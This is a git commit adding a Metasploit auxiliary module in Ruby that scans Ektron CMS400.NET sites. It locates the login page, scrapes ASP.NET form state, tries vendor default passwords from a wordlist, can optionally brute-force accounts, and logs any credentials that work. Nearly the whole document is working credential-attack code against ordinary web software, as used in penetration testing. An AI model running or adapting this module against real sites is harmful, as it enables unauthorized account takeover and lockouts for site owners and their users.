Add aux module CMS400 default pass scanner (feature #6301)

This commit is contained in:
sinn3r 2012-01-30 10:40:59 -06:00
parent df57529b9c
commit a0ac4125cd
1 changed files with 160 additions and 0 deletions

View File

@ -0,0 +1,160 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Ektron CMS400.NET Default Password Scanner',
'Description' => %q{
Ektron CMS400.NET is a web content management system based on .NET.
This module tests for installations that are utilizing default
passwords set by the vendor. Additionally, it has the ability
to brute force user accounts however is not enabled by default to
prevent account lockouts.
},
'License' => MSF_LICENSE,
'Author' => ['Justin Cacak']
))
register_options(
[
#Set to false to prevent account lockouts - it will!
OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]),
OptString.new('URI', [true, "Path to the CMS400.NET login page", '/WorkArea/login.aspx']),
OptPath.new(
'USERPASS_FILE',
[
false,
"File containing users and passwords",
File.join(Msf::Config.install_root, "data", "wordlists", "cms400net_default_userpass.txt")
])
], self.class)
end
def target_url
#Function to display correct protocol and host/vhost info
if rport == 443 or ssl
proto = "https"
else
proto = "http"
end
if vhost != ""
"#{proto}://#{vhost}:#{rport}#{datastore['URI'].to_s}"
else
"#{proto}://#{rhost}:#{rport}#{datastore['URI'].to_s}"
end
end
def run_host(ip)
begin
res = send_request_cgi(
{
'method' => 'GET',
'uri' => datastore['URI']
}, 20)
#Check for HTTP 200 response.
#Numerous versions and configs make if difficult to further fingerprint.
if (res.code == 200)
print_status("Ektron CMS400.NET install found at #{target_url} [HTTP 200]")
#Gather __VIEWSTATE and __EVENTVALIDATION from HTTP response.
#Required to be sent based on some versions/configs.
begin
viewstate = res.body.scan(/<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="(.*)"/)[0][0]
rescue
viewstate = ""
end
begin
eventvalidation = res.body.scan(/<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="(.*)"/)[0][0]
rescue
eventvalidation = ""
end
GetVersion()
print_status "Testing passwords at #{target_url}"
each_user_pass { |user, pass|
do_login(user, pass, viewstate, eventvalidation)
}
else
print_error("Ektron CMS400.NET login page not found at #{target_url}. May need to set VHOST or RPORT. [HTTP #{res.code}]")
end
rescue
print_error ("Ektron CMS400.NET login page not found at #{target_url} [HTTP #{res.code}]")
return
end
end
def GetVersion
#Attempt to retrieve the version of CMS400.NET installed.
#Not always possible based on version/config.
payload = "http://#{vhost}:#{rport}/WorkArea/java/ektron.site-data.js.ashx"
res = send_request_cgi(
{
'method' => 'GET',
'uri' => payload
}, 20)
if (res.body.match(/Version.:.(\d{1,3}.\d{1,3})/))
print_status "Ektron CMS400.NET version: #{$1}"
end
end
def do_login(user=nil, pass=nil, viewstate=viewstate, eventvalidation=eventvalidation)
vprint_status("#{target_url} - Trying: username:'#{user}' with password:'#{pass}'")
post_data = "__VIEWSTATE=#{Rex::Text.uri_encode(viewstate.to_s)}"
post_data << "&__EVENTVALIDATION=#{Rex::Text.uri_encode(eventvalidation.to_s)}"
post_data << "&username=#{Rex::Text.uri_encode(user.to_s)}"
post_data << "&password=#{Rex::Text.uri_encode(pass.to_s)}"
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['URI'],
'data' => post_data,
}, 20)
if (res and res.code == 200 and res.body.to_s.match(/LoginSuceededPanel/i) != nil)
print_good("#{target_url} [Ektron CMS400.NET] Successful login: '#{user}' : '#{pass}'")
report_auth_info(
:host => rhost,
:port => rport,
:sname => 'http',
:user => user,
:pass => pass,
:proof => "WEBAPP=\"Ektron CMS400.NET\", VHOST=#{vhost}",
:source_type => "user_supplied",
:duplicate_ok => true,
:active => true
)
elsif(res and res.code == 200)
vprint_error("#{target_url} [Ekton CMS400.NET] - Failed login as: '#{user}'")
else
print_error("#{target_url} [Error] Unable to authenticate. Check parameters. [HTTP #{res.code}]")
return :abort
end
rescue ::Rex::ConnectionError => e
vprint_error("http://#{tartget_url} - #{e.to_s}")
return :abort
end
end
end